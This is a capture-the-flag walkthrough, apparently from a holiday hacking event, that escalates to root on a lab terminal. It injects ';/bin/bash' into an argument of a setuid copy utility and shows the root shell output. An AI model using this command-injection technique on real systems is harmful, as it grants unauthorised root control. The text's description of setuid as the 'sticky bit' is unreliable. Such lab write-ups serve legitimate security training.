🆙Linux PrivEsc

Location: Island of Misfit Toys: Ostrich Saloon

Objective Description

Find a method to escalate privileges inside this terminal and then run the binary in /root

Solution

While we enumerate for potential paths to elevate our privileges, we find a binary named "simplecopy" that has the user sticky bit set.

Because this binary has the sticky bit set for user, it will run with the privileges of the owner. Since the owner is root, exploiting it may give us root privs.

elf@297f9110cc92:~$ /usr/bin/simplecopy 
Usage: /usr/bin/simplecopy <source> <destination>

It appears that it is indeed a simple copy utility. We find that we are able to inject commands into the arguments for this binary. Using this vulnerability, we can spawn a shell as Root & run the binary specified in the objective to complete this challenge.

elf@297f9110cc92:~$ /usr/bin/simplecopy /tmp/ ";/bin/bash"
cp: missing destination file operand after '/tmp/'
Try 'cp --help' for more information.
root@297f9110cc92:~# whoami && id
root
uid=0(root) gid=0(root) groups=0(root),1000(elf)

PreviousOverview NextNa'an

Last updated 1 year ago